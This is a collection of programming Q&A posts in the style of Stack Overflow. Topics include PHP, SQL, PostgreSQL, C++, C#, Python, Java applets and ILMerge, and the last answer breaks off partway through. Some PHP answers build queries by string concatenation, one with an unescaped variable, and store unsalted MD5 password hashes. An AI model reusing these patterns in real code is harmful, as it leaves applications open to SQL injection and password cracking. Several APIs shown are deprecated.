From what it says on the PHP website, you can use crypt() in the following method: ``` <?php // Set the password & username $username = 'user'; $password = 'mypassword'; // Get the hash, letting the salt be automatically generated $hash = crypt($password); // Write the login:hash pair to the file $contents = $username . ':' . $hash; file_put_contents('.htpasswd', $contents); ?> ``` Part of this example can be found: <https://www.php.net/crypt> This will of course overwrite the entire existing file, so you'll want to do some kind of concatenation. I'm not 100% sure this will work, but I'm pretty sure.
Programmatically building htpasswd
[ "", "php", "automation", ".htpasswd", "" ]
I have a script that retrieves objects from a remote server through an Ajax call. The server returns objects in JSON notation. However, in Adobe AIR, there is a restriction on using [eval()](http://labs.adobe.com/wiki/index.php/AIR:HTML_Security_FAQ#Why_restrict_eval.28.29_for_all_Application_content_if_there_are_legitimate_use_cases_for_using_it.3F) for security reasons. So I'm able to get replies from the remote server, but can't turn them back into JavaScript objects. Is there any workaround for this issue? I would like to use JSON for my JavaScript objects, since it can be used almost immediately. Side-note: I do understand the security implications for forcing the issue, but I will be doing some rapid application development for a competition, so the program would only be a quick prototype, and not used for production purposes. Nevertheless, it would be great if there's a better alternative to what I'm trying to do now --- **Update:** Thanks to [Theo](https://stackoverflow.com/a/24919/7750640) and [jsight](https://stackoverflow.com/a/21716/7750640) for their answers; One important thing I learnt today is that I can actually make use of ActionScript libraries by using the ``` <script src="lib/myClasses.swf" type="application/x-shockwave-flash"></script> ``` tag extended by Adobe AIR. Check out [Theo's](https://stackoverflow.com/a/24919/7750640) link for more details!
You can find a [JSON parser written in JavaScript here](http://www.JSON.org/js.html) ([source code here](https://github.com/douglascrockford/JSON-js/blob/master/json2.js)). You can also use the as3corelib JSON parser from JavaScript, there's [a description of how to access ActionScript libraries from JavaScript here](http://help.adobe.com/en_US/AIR/1.1/devappshtml/WS5b3ccc516d4fbf351e63e3d118666ade46-7ed9.html).
The current AIR release (v2.5) bundles a newer WebKit that has native JSON support, via JSON.stringify() and JSON.parse().
Adobe AIR: Handling JSON objects from server
[ "", "javascript", "ajax", "json", "air", "" ]
I have one field that I need to sum, let's say named `items`. However, that field can be part of group a or b. In the end I need to have all of the items summed for group a and for group b. When I say grouped, I mean there is a LEFT OUTER JOIN to another table: the previous table has a type for the items, and the one being joined has a group assigned for this item type. Sorry guys, I'm a little new to SQL. I am going to try out what you have given me and get back to you. Ok, I feel like we are getting close, just not yet. With Allain's I can get them to separate, but the issue is I need to have both groups summed on the same row, which is difficult because I also have several LEFT OUTER JOINs involved. Tyler's looks like it might work too, so I am trying to hash that out real fast. Allain's seems to be the way to go, but I have to tweak it a little more.
Maybe I'm not understanding the complexity of what you're asking but... shouldn't this do? ``` SELECT groupname, SUM(value) FROM items WHERE groupname IN ('a', 'b') GROUP BY groupname ``` And if you don't care which of a or b the item belongs to then this will do: ``` SELECT SUM(value) FROM items WHERE groupname IN ('a', 'b') ```
You want something like ``` SELECT column,SUM( column ) FROM table GROUP BY column ```
Returning the sum of items depending on which type it is
[ "", "sql", "sql-server", "" ]
I haven't used `C++` since college. Even though I've wanted to I haven't needed to do any until I started wanting to write plugins for `Launchy`. > Is there a good book to read to get back into it? My experience since college is mainly `C#` and recently `ruby`. I bought some book for `C#` developers and it ended up being on how to write `C++` with `CLI`. While a good book it wasn't quite what I was looking for.
The best way to get back into C++ is to jump in. You can't learn a real language without spending any serious time in a country where they speak it. I wouldn't try to learn a programming language without spending time coding in it either. I wouldn't recommend learning C first though. That's a good way to pick up some bad habits in C++.
My favorites are Effective C++, More Effective C++, and Effective STL by Scott Meyers. Also C++ Coding Standards by Sutter and Alexandrescu.
Get back to basics. How do I get back into C++?
[ "", "c++", "" ]
I searched for this subject on Google and got some website about an experts exchange...so I figured I should just ask here instead. How do you embed a `JApplet` in HTML on a webpage?
Here is an example from [sun's website](http://java.sun.com/docs/books/tutorial/uiswing/components/applet.html): ``` <applet code="TumbleItem.class" codebase="examples/" archive="tumbleClasses.jar, tumbleImages.jar" width="600" height="95"> <param name="maxwidth" value="120"> <param name="nimgs" value="17"> <param name="offset" value="-57"> <param name="img" value="images/tumble"> Your browser is completely ignoring the &lt;APPLET&gt; tag! </applet> ```
Although you didn't say so, just in case you were using JSPs, you also have the option of the [jsp:plugin](http://java.sun.com/products/jsp/tags/syntaxref.fm12.html) tag.
Java: JApplet, How do you embed it in a webpage?
[ "", "java", "html", "web-applications", "" ]
I'm going to guess that the answer is "no" based on the below error message (and [this Google result](http://archives.postgresql.org/pgsql-sql/2004-08/msg00076.php)), but is there anyway to perform a cross-database query using PostgreSQL? ``` databaseA=# select * from databaseB.public.someTableName; ERROR: cross-database references are not implemented: "databaseB.public.someTableName" ``` I'm working with some data that is partitioned across two databases although data is really shared between the two (userid columns in one database come from the `users` table in the other database). I have no idea why these are two separate databases instead of schema, but c'est la vie...
*Note: As the original asker implied, if you are setting up two databases on the same machine you probably want to make two [schemas](https://www.postgresql.org/docs/current/static/ddl-schemas.html) instead - in that case you don't need anything special to query across them.* ## `postgres_fdw` Use [`postgres_fdw`](https://www.postgresql.org/docs/current/postgres-fdw.html) (foreign data wrapper) to connect to tables in any Postgres database - local or remote. Note that there are [foreign data wrappers for other popular data sources](http://wiki.postgresql.org/wiki/Foreign_data_wrappers). At this time, only `postgres_fdw` and `file_fdw` are part of the official Postgres distribution. ### For Postgres versions before 9.3 Versions this old are no longer supported, but if you need to do this in a pre-2013 Postgres installation, there is a function called [`dblink`](https://www.postgresql.org/docs/current/dblink.html). I've never used it, but it is maintained and distributed with the rest of PostgreSQL. If you're using the version of PostgreSQL that came with your Linux distro, you might need to install a package called postgresql-contrib.
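If the two databases really must stay separate, a `postgres_fdw` setup is only a few statements. This is a hedged sketch: every name below (`db_b`, `usr`, the `users` and `local_table` tables) is invented for illustration, creating the extension needs appropriate privileges, and `IMPORT FOREIGN SCHEMA` requires Postgres 9.5 or later:

```sql
CREATE EXTENSION postgres_fdw;

-- Point at the other database (here assumed to live on the same host)
CREATE SERVER db_b FOREIGN DATA WRAPPER postgres_fdw
    OPTIONS (host 'localhost', dbname 'databaseB');

CREATE USER MAPPING FOR CURRENT_USER SERVER db_b
    OPTIONS (user 'usr', password 'secret');

-- Either pull in everything at once (9.5+)...
IMPORT FOREIGN SCHEMA public FROM SERVER db_b INTO public;

-- ...or declare just the one table you need:
CREATE FOREIGN TABLE remote_users (
    userid integer,
    name   text
) SERVER db_b OPTIONS (schema_name 'public', table_name 'users');

-- The foreign table then joins like any local one:
SELECT * FROM local_table l JOIN remote_users u ON u.userid = l.userid;
```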
# [dblink()](http://www.postgresql.org/docs/current/interactive/dblink.html) -- executes a query in a remote database > dblink executes a query (usually a SELECT, but it can be any SQL > statement that returns rows) in a remote database. > > When two text arguments are given, the first one is first looked up as > a persistent connection's name; if found, the command is executed on > that connection. If not found, the first argument is treated as a > connection info string as for dblink\_connect, and the indicated > connection is made just for the duration of this command. One good example: ``` SELECT * FROM table1 tb1 LEFT JOIN ( SELECT * FROM dblink('dbname=db2', 'SELECT id, code FROM table2') AS t(id int, code text) ) AS tb2 ON tb2.id = tb1.id; ``` Note: I am giving this information for future reference. [Reference](https://stackoverflow.com/questions/4678862/joining-results-from-two-separate-databases)
Possible to perform cross-database queries with PostgreSQL?
[ "", "sql", "postgresql", "" ]
Why are SQL distributions so non-standard despite an ANSI standard existing for SQL? Are there really that many meaningful differences in the way SQL databases work or is it just the two databases with which I have been working: MS-SQL and PostgreSQL? Why do these differences arise?
It's a form of "Stealth lock-in". Joel goes into great detail here: * <http://www.joelonsoftware.com/articles/fog0000000056.html> * <http://www.joelonsoftware.com/articles/fog0000000052.html> Companies end up tying their business functionality to non-standard or weird unsupported functionality in their implementation; this restricts their ability to move away from their vendor to a competitor. On the other hand, it's pretty short-sighted, because anyone with half a brain will tend to abstract away the proprietary pieces, or avoid the lock-in altogether, if it gets too egregious.
The ANSI standard specifies only a limited set of commands and data types. Once you go beyond those, the implementors are on their own. And some very important concepts aren't specified at all, such as auto-incrementing columns. SQLite just picks the first non-null integer, MySQL requires `AUTO INCREMENT`, PostgreSQL uses sequences, etc. It's a mess, and that's only among the OSS databases! Try getting Oracle, Microsoft, and IBM to collectively decide on a tricky bit of functionality.
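To make the auto-increment divergence concrete, here is the same one-column table sketched in four dialects (syntax from memory; double-check against your server's documentation):

```sql
-- SQLite: an INTEGER PRIMARY KEY column auto-assigns rowids
CREATE TABLE t (id INTEGER PRIMARY KEY, v TEXT);

-- MySQL
CREATE TABLE t (id INT AUTO_INCREMENT PRIMARY KEY, v TEXT);

-- PostgreSQL: serial creates and wires up a sequence behind the scenes
CREATE TABLE t (id serial PRIMARY KEY, v text);

-- SQL Server
CREATE TABLE t (id INT IDENTITY(1,1) PRIMARY KEY, v VARCHAR(100));
```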
Reasons for SQL differences
[ "", "sql", "sql-server", "postgresql", "" ]
I've used the StAX API in Java quite a bit, and find it quite a clean way of dealing with XML files. Is there any equivalent library I could use for performing similar processing in C?
[libxml](http://xmlsoft.org/) is a heavily used and documented XML library for C, which provides a SAX API. [Expat](http://expat.sourceforge.net/) is another, but in my experience is not as well documented.
I have used Expat pretty extensively - I like it for its simplicity and small footprint.
Equivalent to StAX for C
[ "", "java", "c", "xml", "" ]
Does anyone have the secret formula to resizing transparent images (mainly GIFs) *without* ANY quality loss - what so ever? I've tried a bunch of stuff, the closest I get is not good enough. Take a look at my main image: <http://www.thewallcompany.dk/test/main.gif> And then the scaled image: <http://www.thewallcompany.dk/test/ScaledImage.gif> ``` //Internal resize for indexed colored images void IndexedRezise(int xSize, int ySize) { BitmapData sourceData; BitmapData targetData; AdjustSizes(ref xSize, ref ySize); scaledBitmap = new Bitmap(xSize, ySize, bitmap.PixelFormat); scaledBitmap.Palette = bitmap.Palette; sourceData = bitmap.LockBits(new Rectangle(0, 0, bitmap.Width, bitmap.Height), ImageLockMode.ReadOnly, bitmap.PixelFormat); try { targetData = scaledBitmap.LockBits(new Rectangle(0, 0, xSize, ySize), ImageLockMode.WriteOnly, scaledBitmap.PixelFormat); try { xFactor = (Double)bitmap.Width / (Double)scaledBitmap.Width; yFactor = (Double)bitmap.Height / (Double)scaledBitmap.Height; sourceStride = sourceData.Stride; sourceScan0 = sourceData.Scan0; int targetStride = targetData.Stride; System.IntPtr targetScan0 = targetData.Scan0; unsafe { byte* p = (byte*)(void*)targetScan0; int nOffset = targetStride - scaledBitmap.Width; int nWidth = scaledBitmap.Width; for (int y = 0; y < scaledBitmap.Height; ++y) { for (int x = 0; x < nWidth; ++x) { p[0] = GetSourceByteAt(x, y); ++p; } p += nOffset; } } } finally { scaledBitmap.UnlockBits(targetData); } } finally { bitmap.UnlockBits(sourceData); } } ``` I'm using the above code, to do the indexed resizing. Does anyone have improvement ideas?
If there's no requirement on preserving file type after scaling I'd recommend the following approach. ``` using (Image src = Image.FromFile("main.gif")) using (Bitmap dst = new Bitmap(100, 129)) using (Graphics g = Graphics.FromImage(dst)) { g.SmoothingMode = SmoothingMode.AntiAlias; g.InterpolationMode = InterpolationMode.HighQualityBicubic; g.DrawImage(src, 0, 0, dst.Width, dst.Height); dst.Save("scale.png", ImageFormat.Png); } ``` The result will have really nice anti-aliased edges * *removed image shack image that had been replaced by an advert* If you must export the image in GIF you're in for a ride; GDI+ doesn't play well with GIF. See [this blog post](http://www.ben-rush.net/blog/PermaLink.aspx?guid=103ed74d-c808-47ba-b82d-6e9367714b3e&dotnet=consultant) about it for more information **Edit:** I forgot to dispose of the bitmaps in the example; it's been corrected
This is a basic resize function I've used for a few of my applications that leverages GDI+ ``` /// <summary> /// Resize image with GDI+ so that image is nice and clear with required size. /// </summary> /// <param name="SourceImage">Image to resize</param> /// <param name="NewHeight">New height to resize to.</param> /// <param name="NewWidth">New width to resize to.</param> /// <returns>Image object resized to new dimensions.</returns> /// <remarks></remarks> public static Image ImageResize(Image SourceImage, Int32 NewHeight, Int32 NewWidth) { System.Drawing.Bitmap bitmap = new System.Drawing.Bitmap(NewWidth, NewHeight, SourceImage.PixelFormat); if (bitmap.PixelFormat == System.Drawing.Imaging.PixelFormat.Format1bppIndexed || bitmap.PixelFormat == System.Drawing.Imaging.PixelFormat.Format4bppIndexed || bitmap.PixelFormat == System.Drawing.Imaging.PixelFormat.Format8bppIndexed || bitmap.PixelFormat == System.Drawing.Imaging.PixelFormat.Undefined || bitmap.PixelFormat == System.Drawing.Imaging.PixelFormat.DontCare || bitmap.PixelFormat == System.Drawing.Imaging.PixelFormat.Format16bppArgb1555 || bitmap.PixelFormat == System.Drawing.Imaging.PixelFormat.Format16bppGrayScale) { throw new NotSupportedException("Pixel format of the image is not supported."); } using (System.Drawing.Graphics graphicsImage = System.Drawing.Graphics.FromImage(bitmap)) { graphicsImage.SmoothingMode = System.Drawing.Drawing2D.SmoothingMode.HighQuality; graphicsImage.InterpolationMode = System.Drawing.Drawing2D.InterpolationMode.HighQualityBicubic; graphicsImage.DrawImage(SourceImage, 0, 0, bitmap.Width, bitmap.Height); } return bitmap; } ``` I don't remember off the top of my head if it will work with GIFs, but you can give it a try. Note: I can't take full credit for this function. I pieced a few things together from some other samples online and made it work to my needs 8^D
Resize transparent images using C#
[ "", "c#", ".net", "image", "resize", "image-scaling", "" ]
I use Firebug and the Mozilla JS console heavily, but every now and then I run into an IE-only JavaScript bug, which is really hard to locate (ex: *error on line 724*, when the source HTML only has 200 lines). I would love to have a lightweight JS tool (*a la* firebug) for Internet Explorer, something I can install in seconds on a client's PC if I run into an error and then uninstall. Some Microsoft tools take some serious download and configuration time. Any ideas?
You might find [Firebug Lite](http://getfirebug.com/lite.html) useful for that. Its bookmarklet should be especially useful when debugging on a user's machine.
Since Internet Explorer 8, IE has been shipping with a pretty impressive set of tools for JavaScript debugging, profiling, and more. Like most other browsers, the developer tools are accessible by pressing F12 on your keyboard. ### Script Tab The Script tab is likely what you'll be interested in, though the Console, Profiler, and Network tabs get plenty of use as well while debugging applications. ![enter image description here](https://i.stack.imgur.com/MawsG.png) From the Script tab you can: * Format JavaScript to make it more readable * Move from source to source of various resources on the page * Insert breakpoints * Move in and over lines of code while stepping through its execution * Watch variables * Inspect the call stack to see how code was executed * Toggle breakpoints * and more... ### Console Tab The console tab is great for when you need to execute some arbitrary code against the application. I use this to check the return of certain methods, or even to quickly test solutions for answers on Stack Overflow. ![enter image description here](https://i.stack.imgur.com/uKoi7.png) ### Profiler Tab The profile is awesome if you're looking for long-running processes, or trying to optimize your code to run smoother or make fewer calls to resource-intensive methods. Open up any page and click "Start profiling" from the Profiler tab to start recording. While the profiler is working, you can move about the page, performing common actions. When you feel you've recorded enough, hit "Stop profiling." You will then be shown a summary of all functions ran, or a call tree. You can quickly sort this data by various columns: ![enter image description here](https://i.stack.imgur.com/De6ob.png) ### Network Tab The network tab will record traffic on your site/application. It's very handy for finding files that aren't being downloaded, hanging, or for tracking data that is being requested asynchronously. 
Within this tab you can also move between a Summary view and a Detailed view. Within the Detailed view you can inspect headers sent with requests, and responses. You can view cookie information, check the timing of events, and more.

![enter image description here](https://i.stack.imgur.com/vcREz.png)

I'm not really doing the IE Developer Tools justice - there is a lot of uncovered ground. I would encourage you to check them out though, and make them a part of your development.
JavaScript Troubleshooting Tools in Internet Explorer
[ "", "javascript", "internet-explorer", "debugging", "" ]
If I use `assert()` and the assertion fails then `assert()` will call `abort()`, ending the running program abruptly. I can't afford that in my production code. Is there a way to assert in runtime yet be able to catch failed assertions so I have the chance to handle them gracefully?
Yes, as a matter of fact there is. You will need to write a custom assert function yourself, as C++'s `assert()` is exactly C's `assert()`, with the `abort()` "feature" bundled in. Fortunately, this is surprisingly straightforward.

*Assert.hh*

```
template <typename X, typename A>
inline void Assert(A assertion)
{
    if( !assertion ) throw X();
}
```

The above function will throw an exception if a predicate doesn't hold. You will then have the chance to catch the exception. If you don't catch the exception, `terminate()` will be called, which will end the program similarly to `abort()`.

You may wonder about optimizing away the assertion when we're building for production. In this case, you can define constants that signify that you're building for production and then refer to the constant when you `Assert()`.

*debug.hh*

```
#ifdef NDEBUG
const bool CHECK_WRONG = false;
#else
const bool CHECK_WRONG = true;
#endif
```

*main.cc*

```
#include <iostream>

#include "Assert.hh"
#include "debug.hh"

struct Wrong { };

int main()
{
    try
    {
        Assert<Wrong>(!CHECK_WRONG || 2 + 2 == 5);
        std::cout << "I can go to sleep now.\n";
    }
    catch( Wrong e )
    {
        std::cerr << "Someone is wrong on the internet!\n";
    }

    return 0;
}
```

If `CHECK_WRONG` is a constant then the call to `Assert()` will be compiled away in production, even if the assertion is not a constant expression.

There is a slight disadvantage in that by referring to `CHECK_WRONG` we type a little more. But in exchange we gain an advantage in that we can classify various groups of assertions and enable and disable each of them as we see fit. So, for example, we could define a group of assertions that we want enabled even in production code, and then define a group of assertions that we only want to see in development builds.

The `Assert()` function is equivalent to typing

```
if( !assertion ) throw X();
```

but it clearly indicates the intent of the programmer: make an assertion. Assertions are also easier to grep for with this approach, just like plain `assert()`s.
For more details on this technique see Bjarne Stroustrup's The C++ Programming Language 3e, section 24.3.7.2.
[glib's error reporting functions](http://library.gnome.org/devel/glib/unstable/glib-Warnings-and-Assertions.html "glib documentation for error reporting functions") take the approach of continuing after an assert. glib is the underlying platform independence library that Gnome (via GTK) uses. Here's a macro that checks a precondition and prints a stack trace if the precondition fails.

```
#define RETURN_IF_FAIL(expr)  do {                                  \
    if (!(expr))                                                    \
    {                                                               \
        fprintf(stderr,                                             \
                "file %s: line %d (%s): precondition `%s' failed.", \
                __FILE__,                                           \
                __LINE__,                                           \
                __PRETTY_FUNCTION__,                                \
                #expr);                                             \
        print_stack_trace(2);                                       \
        return;                                                     \
    };  } while(0)

#define RETURN_VAL_IF_FAIL(expr, val)  do {                         \
    if (!(expr))                                                    \
    {                                                               \
        fprintf(stderr,                                             \
                "file %s: line %d (%s): precondition `%s' failed.", \
                __FILE__,                                           \
                __LINE__,                                           \
                __PRETTY_FUNCTION__,                                \
                #expr);                                             \
        print_stack_trace(2);                                       \
        return val;                                                 \
    };  } while(0)
```

Here's the function that prints the stack trace, written for an environment that uses the gnu toolchain (gcc); it needs `<stdio.h>` and `<execinfo.h>`:

```
#include <stdio.h>
#include <execinfo.h>

void print_stack_trace(int fd)
{
    void *array[256];
    size_t size;

    size = backtrace(array, 256);
    backtrace_symbols_fd(array, size, fd);
}
```

This is how you'd use the macros:

```
char *doSomething(char *ptr)
{
    RETURN_VAL_IF_FAIL(ptr != NULL, NULL);  // same as assert(ptr != NULL), but returns NULL if it fails.

    if( ptr != NULL )  // Necessary if you want to define the macro only for debug builds
    {
        ...
    }

    return ptr;
}

void doSomethingElse(char *ptr)
{
    RETURN_IF_FAIL(ptr != NULL);
}
```
How can I assert() without using abort()?
[ "", "c++", "exception", "assert", "" ]
Below I have a very simple example of what I'm trying to do. I want to be able to use HTMLDecorator with any other class. Ignore the fact it's called decorator, it's just a name.

```
import cgi

class ClassX(object):
    pass # ... with own __repr__

class ClassY(object):
    pass # ... with own __repr__

inst_x=ClassX()
inst_y=ClassY()
inst_z=[ i*i for i in range(25) ]
inst_b=True

class HTMLDecorator(object):
    def html(self): # an "enhanced" version of __repr__
        return cgi.escape(self.__repr__()).join(("<H1>","</H1>"))

print HTMLDecorator(inst_x).html()
print HTMLDecorator(inst_y).html()
wrapped_z = HTMLDecorator(inst_z)
inst_z[0] += 70
wrapped_z[0] += 71
print wrapped_z.html()
print HTMLDecorator(inst_b).html()
```

Output:

```
Traceback (most recent call last):
  File "html.py", line 21, in 
    print HTMLDecorator(inst_x).html()
TypeError: default __new__ takes no parameters
```

Is what I'm trying to do possible? If so, what am I doing wrong?
> Very close, but then I lose everything from ClassX. Below is something a colleague gave me that does do the trick, but it's hideous. There has to be a better way.

Looks like you're trying to set up some sort of proxy object scheme. That's doable, and there are better solutions than your colleague's, but first consider whether it would be easier to just patch in some extra methods. This won't work for built-in classes like `bool`, but it will for your user-defined classes:

```
def HTMLDecorator (obj):
    def html ():
        sep = cgi.escape (repr (obj))
        return sep.join (("<H1>", "</H1>"))
    obj.html = html
    return obj
```

And here is the proxy version:

```
class HTMLDecorator(object):
    def __init__ (self, wrapped):
        self.__wrapped = wrapped

    def html (self):
        sep = cgi.escape (repr (self.__wrapped))
        return sep.join (("<H1>", "</H1>"))

    def __getattr__ (self, name):
        return getattr (self.__wrapped, name)

    def __setattr__ (self, name, value):
        if not name.startswith ('_HTMLDecorator__'):
            setattr (self.__wrapped, name, value)
            return
        super (HTMLDecorator, self).__setattr__ (name, value)

    def __delattr__ (self, name):
        delattr (self.__wrapped, name)
```
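To see the proxy's delegation machinery in isolation, here is a small self-contained sketch of the same pattern (Python 3 names; `AttrProxy` and `Point` are illustrative, not from the answer above):

```python
import html

class AttrProxy(object):
    """Generic proxy that forwards attribute access to a wrapped object."""
    def __init__(self, wrapped):
        # Bypass our own __setattr__ so the attribute lands on the proxy itself.
        object.__setattr__(self, '_wrapped', wrapped)

    def html(self):
        # The "decorated" behaviour: an escaped, H1-wrapped repr.
        return "<H1>%s</H1>" % html.escape(repr(self._wrapped))

    def __getattr__(self, name):
        # Called only when normal lookup fails, so delegate to the target.
        return getattr(self._wrapped, name)

    def __setattr__(self, name, value):
        # All writes go straight through to the wrapped object.
        setattr(self._wrapped, name, value)

class Point(object):
    def __init__(self):
        self.x = 1
    def __repr__(self):
        return "<Point x=%d>" % self.x

p = AttrProxy(Point())
p.x += 1            # read and write are both forwarded to the wrapped Point
print(p.x)          # 2
print(p.html())     # <H1>&lt;Point x=2&gt;</H1>
```

Reads fall through `__getattr__` to the wrapped instance, writes are forwarded by `__setattr__`, and only `html()` lives on the proxy itself.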
Both of John's solutions would work. Another option that allows HTMLDecorator to remain very simple and clean is to monkey-patch it in as a base class. This also works only for user-defined classes, not builtin types:

```
import cgi

class ClassX(object):
    pass # ... with own __repr__

class ClassY(object):
    pass # ... with own __repr__

inst_x=ClassX()
inst_y=ClassY()

class HTMLDecorator:
    def html(self): # an "enhanced" version of __repr__
        return cgi.escape(self.__repr__()).join(("<H1>","</H1>"))

ClassX.__bases__ += (HTMLDecorator,)
ClassY.__bases__ += (HTMLDecorator,)

print inst_x.html()
print inst_y.html()
```

Be warned, though -- monkey-patching like this comes with a high price in readability and maintainability of your code. When you go back to this code a year later, it can become very difficult to figure out how your ClassX got that html() method, especially if ClassX is defined in some other library.
How can I simply inherit methods from an existing instance?
[ "", "python", "oop", "inheritance", "object", "" ]
Because regular expressions scare me, I'm trying to find a way to remove all HTML tags and resolve HTML entities from a string in Python.
Use [lxml](http://lxml.de/) which is the best xml/html library for python.

```
import lxml.html

t = lxml.html.fromstring("...")
t.text_content()
```

And if you just want to sanitize the html look at the lxml.html.clean [module](http://lxml.de/lxmlhtml.html#cleaning-up-html).
Use [BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/)! It's perfect for this, where you have incoming markup of dubious virtue and need to get something reasonable out of it. Just pass in the original text, extract all the string tags, and join them.
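If pulling in a third-party library isn't an option, the same job can be sketched with the standard library's `html.parser` instead (Python 3 module names; `TagStripper` is our illustrative name, not part of either library):

```python
from html.parser import HTMLParser

class TagStripper(HTMLParser):
    """Collects text content and drops tags. Entity and character
    references are resolved automatically because convert_charrefs=True."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.chunks = []

    def handle_data(self, data):
        self.chunks.append(data)

    def text(self):
        return "".join(self.chunks)

def strip_tags(markup):
    parser = TagStripper()
    parser.feed(markup)
    parser.close()
    return parser.text()

print(strip_tags("<p>caf&eacute; &amp; <b>bar</b></p>"))  # café & bar
```

Unlike BeautifulSoup, this does no error correction on badly broken markup, so it is only a reasonable fallback for input you mostly trust to be well-formed.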
Filter out HTML tags and resolve entities in python
[ "", "python", "html", "" ]
What is the quickest way to get a large amount of data (think golf) and the most efficient (think performance) to get a large amount of data from a MySQL database to a session without having to continue doing what I already have:

```
$sql = "SELECT * FROM users WHERE username='" . mysql_escape_string($_POST['username']) . "' AND password='" . mysql_escape_string(md5($_POST['password'])) . "'";
$result = mysql_query($sql, $link) or die("There was an error while trying to get your information.\n<!--\n" . mysql_error($link) . "\n-->");
if(mysql_num_rows($result) < 1)
{
    $_SESSION['username'] = $_POST['username'];
    redirect('index.php?p=signup');
}
$_SESSION['id'] = mysql_result($result, '0', 'id');
$_SESSION['fName'] = mysql_result($result, '0', 'fName');
$_SESSION['lName'] = mysql_result($result, '0', 'lName');
...
```

And before anyone asks yes I do really need to 'SELECT

Edit: Yes, I am sanitizing the data, so that there can be no SQL injection, that is further up in the code.
I came up with this and it appears to work.

```
while($row = mysql_fetch_assoc($result))
{
    $_SESSION = array_merge_recursive($_SESSION, $row);
}
```
Most efficient:

```
$get = mysql_query("SELECT * FROM table_name WHERE field_name=$something") or die(mysql_error());
$_SESSION['data'] = mysql_fetch_assoc($get);
```

Done. This is now stored in an array. So say a field is username you just do:

```
echo $_SESSION['data']['username'];
```

Data is the name of the array - username is the array field.. which holds the value for that field.

EDIT: fixed some syntax mistakes :P but you get the idea.
Most efficient way to get data from the database to session
[ "", "php", "mysql", "session", "" ]
Do you use ILMerge? Do you use ILMerge to merge multiple assemblies to ease deployment of dll's? Have you found problems with deployment/versioning in production after ILMerging assemblies together? I'm looking for some advice in regards to using ILMerge to reduce deployment friction, if that is even possible.
I use ILMerge for almost all of my different applications. I have it integrated right into the release build process so what I end up with is one exe per application with no extra dll's. You can't ILMerge any C++ assemblies that have native code. You also can't ILMerge any assemblies that contain XAML for WPF (at least I haven't had any success with that). It complains at runtime that the resources cannot be located. I did write a wrapper executable for ILMerge where I pass in the startup exe name for the project I want to merge, and an output exe name, and then it reflects the dependent assemblies and calls ILMerge with the appropriate command line parameters. It is much easier now when I add new assemblies to the project, I don't have to remember to update the build script.
## Introduction

This post shows how to replace all `.exe + .dll files` with a single `combined .exe`. It also keeps the debugging `.pdb` file intact.

## For Console Apps

Here is the basic `Post Build String` for Visual Studio 2010 SP1, using .NET 4.0. I am building a console .exe with all of the sub-.dll files included in it.

```
"$(SolutionDir)ILMerge\ILMerge.exe" /out:"$(TargetDir)$(TargetName).all.exe" "$(TargetDir)$(TargetName).exe" "$(TargetDir)*.dll" /target:exe /targetplatform:v4,C:\Windows\Microsoft.NET\Framework64\v4.0.30319 /wildcards
```

## Basic hints

* The output is a file "`AssemblyName.all.exe`" which combines all sub-dlls into one .exe.
* Notice the `ILMerge\` directory. You need to either copy the ILMerge utility into your solution directory (so you can distribute the source without having to worry about documenting the install of ILMerge), or change this path to point to where ILMerge.exe resides.

## Advanced hints

If you have problems with it not working, turn on `Output`, and select `Show output from: Build`. Check the exact command that Visual Studio actually generated, and check for errors.

# Sample Build Script

This script replaces all `.exe + .dll files` with a single `combined .exe`. It also keeps the debugging .pdb file intact.

To use, paste this into your `Post Build` step, under the `Build Events` tab in a C# project, and make sure you adjust the path in the first line to point to `ILMerge.exe`:

```
rem Create a single .exe that combines the root .exe and all subassemblies.
"$(SolutionDir)ILMerge\ILMerge.exe" /out:"$(TargetDir)$(TargetName).all.exe" "$(TargetDir)$(TargetName).exe" "$(TargetDir)*.dll" /target:exe /targetplatform:v4,C:\Windows\Microsoft.NET\Framework64\v4.0.30319 /wildcards

rem Remove all subassemblies.
del *.dll

rem Remove all .pdb files (except the new, combined pdb we just created).
ren "$(TargetDir)$(TargetName).all.pdb" "$(TargetName).all.pdb.temp"
del *.pdb
ren "$(TargetDir)$(TargetName).all.pdb.temp" "$(TargetName).all.pdb"

rem Delete the original, non-combined .exe.
del "$(TargetDir)$(TargetName).exe"

rem Rename the combined .exe and .pdb to the original project name we started with.
ren "$(TargetDir)$(TargetName).all.pdb" "$(TargetName).pdb"
ren "$(TargetDir)$(TargetName).all.exe" "$(TargetName).exe"

exit 0
```
ILMerge Best Practices
[ "", "c#", ".net", "deployment", "ilmerge", "" ]
Before you answer this I have never developed anything popular enough to attain high server loads. Treat me as (sigh) an alien that has just landed on the planet, albeit one that knows PHP and a few optimisation techniques.

---

I'm developing a tool in **PHP** that could attain quite a lot of users, if it works out right. However while I'm fully capable of developing the program I'm pretty much clueless when it comes to making something that can deal with huge traffic. So here's a few questions on it (feel free to turn this question into a resource thread as well).

## Databases

At the moment I plan to use the MySQLi features in PHP5. However how should I set up the databases in relation to users and content? Do I actually *need* multiple databases? At the moment everything's jumbled into one database - although I've been considering spreading user data to one, actual content to another and finally core site content (template masters etc.) to another.

My reasoning behind this is that sending queries to different databases will ease up the load on them as one database = 3 load sources. Also would this still be effective if they were all on the same server?

## Caching

I have a template system that is used to build the pages and swap out variables. Master templates are stored in the database and each time a template is called its cached copy (a html document) is called. At the moment I have two types of variable in these templates - a static var and a dynamic var. Static vars are usually things like page names, the name of the site - things that don't change often; dynamic vars are things that change on each page load.

My question on this: Say I have comments on different articles. Which is a better solution: store the simple comment template and render comments (from a DB call) each time the page is loaded, or store a cached copy of the comments page as a html page - each time a comment is added/edited/deleted the page is recached.
## Finally

Does anyone have any tips/pointers for running a high-load site on PHP? I'm pretty sure it's a workable language to use - Facebook and Yahoo! give it great precedence - but are there any experiences I should watch out for?
No two sites are alike. You really need to get a tool like [jmeter](http://jakarta.apache.org/jmeter/) and benchmark to see where your problem points will be. You can spend a lot of time guessing and improving, but you won't see real results until you measure and compare your changes.

For example, for many years, the MySQL query cache was the solution to all of our performance problems. If your site was slow, MySQL experts suggested turning the query cache on. It turns out that if you have a high write load, the cache is actually crippling. If you turned it on without testing, you'd never know.

And don't forget that you are never done scaling. A site that handles 10req/s will need changes to support 1000req/s. And if you're lucky enough to need to support 10,000req/s, your architecture will probably look completely different as well.

# Databases

* Don't use MySQLi -- [PDO](http://ca.php.net/pdo) is the 'modern' OO database access layer. The most important feature to use is placeholders in your queries. It's smart enough to use server side prepares and other optimizations for you as well.
